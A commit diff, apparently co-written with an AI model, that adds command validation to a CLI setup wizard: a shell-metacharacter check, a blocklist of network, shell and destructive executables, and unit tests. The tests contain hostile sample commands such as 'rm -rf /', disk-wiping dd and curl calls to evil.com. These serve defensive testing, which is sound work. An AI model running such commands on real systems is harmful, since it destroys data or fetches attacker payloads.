feat(init): add command execution guardrails to local-ops

Validate commands before shell execution with two layers:
- Block shell metacharacters (;, &&, ||, |, backticks, $(), newlines)
- Blocklist of 37 dangerous executables (rm, curl, sudo, ssh, etc.)

This prevents the CLI from blindly executing arbitrary commands if the
remote API is compromised or the LLM hallucinates a bad command.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

Author: betegon

src/lib/init/local-ops.ts

@@ -24,6 +24,71 @@ import type {
   WizardOptions,
 } from "./types.js";
 
+/**
+ * Shell metacharacters that enable chaining, piping, substitution, or redirection.
+ * All legitimate install commands are simple single commands that don't need these.
+ */
+const SHELL_METACHARACTER_PATTERNS: Array<{ pattern: string; label: string }> = [
+  { pattern: ";", label: "command chaining (;)" },
+  // Check multi-char operators before single `|` so labels are accurate
+  { pattern: "&&", label: "command chaining (&&)" },
+  { pattern: "||", label: "command chaining (||)" },
+  { pattern: "|", label: "piping (|)" },
+  { pattern: "`", label: "command substitution (`)" },
+  { pattern: "$(", label: "command substitution ($()" },
+  { pattern: "\n", label: "newline" },
+  { pattern: "\r", label: "carriage return" },
+];
+
+/**
+ * Executables that should never appear in a package install command.
+ */
+const BLOCKED_EXECUTABLES = new Set([
+  // Destructive
+  "rm", "rmdir", "del",
+  // Network/exfil
+  "curl", "wget", "nc", "ncat", "netcat", "socat", "telnet", "ftp",
+  // Privilege escalation
+  "sudo", "su", "doas",
+  // Permissions
+  "chmod", "chown", "chgrp",
+  // Process/system
+  "kill", "killall", "pkill", "shutdown", "reboot", "halt", "poweroff",
+  // Disk
+  "dd", "mkfs", "fdisk", "mount", "umount",
+  // Remote access
+  "ssh", "scp", "sftp",
+  // Shells
+  "bash", "sh", "zsh", "fish", "csh", "dash",
+  // Misc dangerous
+  "eval", "exec", "env", "xargs",
+]);
+
+/**
+ * Validate a command before execution.
+ * Returns an error message if the command is unsafe, or undefined if it's OK.
+ */
+export function validateCommand(command: string): string | undefined {
+  // Layer 1: Block shell metacharacters
+  for (const { pattern, label } of SHELL_METACHARACTER_PATTERNS) {
+    if (command.includes(pattern)) {
+      return `Blocked command: contains ${label} — "${command}"`;
+    }
+  }
+
+  // Layer 2: Block dangerous executables
+  const firstToken = command.trimStart().split(/\s+/)[0];
+  if (!firstToken) {
+    return `Blocked command: empty command`;
+  }
+  const executable = path.basename(firstToken);
+  if (BLOCKED_EXECUTABLES.has(executable)) {
+    return `Blocked command: disallowed executable "${executable}" — "${command}"`;
+  }
+
+  return undefined;
+}
+
 /**
  * Resolve a path relative to cwd and verify it's inside cwd.
  * Rejects path traversal attempts.
@@ -190,6 +255,12 @@ async function runCommands(
       });
       continue;
     }
+
+    const validationError = validateCommand(command);
+    if (validationError) {
+      return { ok: false, error: validationError };
+    }
+
     const result = await runSingleCommand(command, cwd, timeoutMs);
     results.push(result);
     if (result.exitCode !== 0) {

test/lib/init/local-ops.test.ts

@@ -0,0 +1,79 @@
+import { describe, expect, test } from "bun:test";
+import { validateCommand } from "../../../src/lib/init/local-ops.js";
+
+describe("validateCommand", () => {
+  test("allows legitimate install commands", () => {
+    const commands = [
+      "npm install @sentry/node",
+      "npm install --save @sentry/react @sentry/browser",
+      "yarn add @sentry/node",
+      "pnpm add @sentry/node",
+      "pip install sentry-sdk",
+      "pip install sentry-sdk[flask]",
+      'pip install "sentry-sdk>=1.0"',
+      'pip install "sentry-sdk<2.0,>=1.0"',
+      "pip install -r requirements.txt",
+      "cargo add sentry",
+      "bundle add sentry-ruby",
+      "gem install sentry-ruby",
+      "composer require sentry/sentry-laravel",
+      "dotnet add package Sentry",
+      "go get github.com/getsentry/sentry-go",
+      "flutter pub add sentry_flutter",
+      "npx @sentry/wizard@latest -i nextjs",
+      "poetry add sentry-sdk",
+      "npm install foo@>=1.0.0",
+    ];
+    for (const cmd of commands) {
+      expect(validateCommand(cmd)).toBeUndefined();
+    }
+  });
+
+  test("blocks shell metacharacters", () => {
+    for (const cmd of [
+      "npm install foo; rm -rf /",
+      "npm install foo && curl evil.com",
+      "npm install foo || curl evil.com",
+      "npm install foo | tee /etc/passwd",
+      "npm install `curl evil.com`",
+      "npm install $(curl evil.com)",
+      "npm install foo\ncurl evil.com",
+      "npm install foo\rcurl evil.com",
+    ]) {
+      expect(validateCommand(cmd)).toContain("Blocked command");
+    }
+  });
+
+  test("blocks dangerous executables", () => {
+    for (const cmd of [
+      "rm -rf /",
+      "curl https://evil.com/payload",
+      "sudo npm install foo",
+      "chmod 777 /etc/passwd",
+      "kill -9 1",
+      "dd if=/dev/zero of=/dev/sda",
+      "ssh user@host",
+      "bash -c 'echo hello'",
+      "sh -c 'echo hello'",
+      "env npm install foo",
+      "xargs rm",
+    ]) {
+      expect(validateCommand(cmd)).toContain("Blocked command");
+    }
+  });
+
+  test("resolves path-prefixed executables", () => {
+    // Safe executables with paths pass
+    expect(validateCommand("./venv/bin/pip install sentry-sdk")).toBeUndefined();
+    expect(validateCommand("/usr/local/bin/npm install foo")).toBeUndefined();
+
+    // Dangerous executables with paths are still blocked
+    expect(validateCommand("./venv/bin/rm -rf /")).toContain('"rm"');
+    expect(validateCommand("/usr/bin/curl https://evil.com")).toContain('"curl"');
+  });
+
+  test("blocks empty and whitespace-only commands", () => {
+    expect(validateCommand("")).toContain("empty command");
+    expect(validateCommand("   ")).toContain("empty command");
+  });
+});